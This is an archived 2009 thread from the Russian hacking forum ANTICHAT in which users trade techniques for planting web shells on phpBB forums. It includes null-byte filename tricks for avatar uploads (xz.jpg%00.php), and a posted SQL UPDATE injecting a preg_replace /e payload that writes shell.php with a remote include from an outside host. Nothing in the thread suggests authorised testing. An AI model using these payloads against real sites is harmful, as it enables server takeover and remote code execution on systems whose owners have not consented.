ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
02.05.2009, 01:45
|
|
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789
Репутация:
227
|
|
Pashkela, я не думаю, что он этого незнал, так, для удобства написал, чтобы потом можнобыло не только датабэйс выводить
|
|
|
02.05.2009, 01:52
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
я тоже подозреваю, что знал, читай про "длину запроса". Не просто так написал
|
|
|
|
02.05.2009, 02:19
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
вообще использование concat_ws более надёжно, функция concat если ей будет передано значение равное NULL вернёт 0, а не то что хотелось бы)
поэтому старайтесь юзать with separator, дабы избежать лишних проблем
|
|
|
|
02.05.2009, 13:50
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Кто знает актуал методы залития шелла в phpbb?
Импорт БД не канает, в гугле искал - ничего нормального
|
|
|
|
02.05.2009, 13:54
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Почему? У меня все работает. Используй метод с аватарой.
|
|
|
|
02.05.2009, 13:59
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
mailbrush вот! хочу спросить про метод с аватаркой
Поподробней расскажи своими словами как его юзать
Эксплоит от шанкара не канает почему то
При импорте БД пишет
SQL Error : 1045 Access denied for user '***'@'%' (using password: YES)
Последний раз редактировалось diznt; 02.05.2009 в 14:04..
|
|
|
|
02.05.2009, 14:07
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от diznt
При импорте БД пишет
SQL Error : 1045 Access denied for user 'stasya'@'%' (using password: YES)
Ничего удивительного нет, прав у текущего юзера не хватает на выборку из БД...
Сообщение от diznt
mailbrush вот! хочу спросить про метод с аватаркой
Поподробней расскажи своими словами как его юзать
Эксплоит от шанкара не канает почему то
Метод древний как сам мир... на линк почитай, там всё описанно, можно кстати не только через аватарку, как вариант ещё и атачем...
|
|
|
|
02.05.2009, 14:42
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
DrAssault не знаю правильно я сделал, кароче сделал файл xz.jpg в нем php скрипт который записывает в опр. файл кое-что, при загрузке пишет
Unable to upload file
DEBUG MODE
Line : 251
File : usercp_avatar.php
пробывал по разному: xz.jpg%00.php xz.php%00.jpg |
|
|
|
02.05.2009, 14:57
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
вот тебе все способы ^__^. На все форумах, что я пробовал, работал 4-й способ. |
|
|
|
02.05.2009, 15:44
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
laedafess ок фенкс. 4 способ действительно проканал. (высвечиваеться phpinfo) но я чет не догоняю как залить с помощью этого шелл
Вот код который импортирую
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:
$file= fopen(`shell.php`,`w`);
fwrite($file, `<? @include("http://diznt.narod.ru/info2.txt"); ?>`);
fclose($file);' WHERE user_id=2;
Получаеться в подписи сам код!
phpbb
$file= fopen(`shell.php`,`w`);
fwrite($file, `<? @include("http
fclose($file);
При этом сам файл shell.php не создаеться!
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
